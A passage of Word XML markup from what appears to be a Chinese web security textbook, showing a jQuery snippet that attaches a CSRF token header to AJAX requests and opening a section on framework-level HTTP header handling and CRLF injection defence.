          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.830142pt;width:411.15pt;height:280pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-68440" coordorigin="254,157" coordsize="8223,5600" path="m8477,5357l254,5357,254,5557,254,5756,8477,5756,8477,5557,8477,5357m8477,4757l254,4757,254,4957,254,5156,254,5357,8477,5357,8477,5156,8477,4957,8477,4757m8477,1157l254,1157,254,1357,254,1556,254,1757,254,1957,254,2156,254,2357,254,2557,254,2756,254,2957,254,3157,254,3356,254,3557,254,3757,254,3956,254,4157,254,4357,254,4556,254,4757,8477,4757,8477,4556,8477,4357,8477,4157,8477,3956,8477,3757,8477,3557,8477,3356,8477,3157,8477,2957,8477,2756,8477,2557,8477,2357,8477,2156,8477,1957,8477,1757,8477,1556,8477,1357,8477,1157m8477,557l254,557,254,757,254,956,254,1157,8477,1157,8477,956,8477,757,8477,557m8477,157l254,157,254,356,254,557,8477,557,8477,356,8477,157e" filled="true" fillcolor="#dadada" stroked="false">
            <v:path arrowok="t"/>
            <v:fill type="solid"/>
            <w10:wrap type="none"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$(document).ajaxSend(function(event, xhr, settings) { function getCookie(name) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var cookieValue = null;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="1160" w:right="3227" w:hanging="320"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if (document.cookie &amp;&amp; document.cookie != '') { var cookies = document.cookie.split(';'); for (var i = 0; i &lt; cookies.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="1479" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var cookie = jQuery.trim(cookies[i]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="1479" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Does this cookie string begin with the name we want?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21"/>
        <w:ind w:left="1479" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if (cookie.substring(0, name.length + 1) == (name + '=')) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="1800" w:right="250" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1479" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="1160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return cookieValue;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function sameOrigin(url) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
        <w:ind w:left="841" w:right="2458" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// url could be relative or scheme relative or absolute var host = document.location.host; // host + port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="841" w:right="3706" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var protocol = document.location.protocol; var sr_origin = '//' + host;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var origin = protocol + sr_origin;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Allow absolute or scheme relative URLs to same origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
        <w:ind w:left="1160" w:right="128" w:hanging="320"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return (url == origin || url.slice(0, origin.length + 1) == origin + '/') || (url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>sr_origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>url.slice(0,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>sr_origin.length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>sr_origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'/')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="1160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// or any other URL that isn't scheme relative or absolute i.e relative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21"/>
        <w:ind w:left="1160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>!(/^(\/\/|http:|https:).*/.test(url));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="17"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:411.15pt;height:80.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>function safeMethod(method) {</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="667" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>return (/^(GET|HEAD|OPTIONS|TRACE)$/.test(method));</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="2"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="19"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="667" w:right="1790" w:hanging="322"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (!safeMethod(settings.type) &amp;&amp; sameOrigin(settings.url)) { xhr.setRequestHeader("X-CSRFToken", getCookie('csrftoken'));</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>});</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="146"/>
        <w:ind w:left="203" w:right="223" w:firstLine="419"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>以及一些其他的流行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>框架中，并没有直接提供针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的保护，因此这些功能需要自己实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>框架中，可以对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:bookmarkStart w:name="12.4  HTTP Headers管理" w:id="73"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>头进行全局化的处理，因此一些基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>头的安全方案可以很好地实施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>比如针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>返回头的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CRLF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-35"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>攻击原理细节请参考“注入攻击”一章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-86"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-35"/>
        </w:rPr>
        <w:t>，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>头实际上可以看成是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>key-value </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>对，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:8.007676pt;width:411.15pt;height:20.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4480;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="5678" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Location: </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId78">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>http://www.a.com</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> Host: 127.0.0.1</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
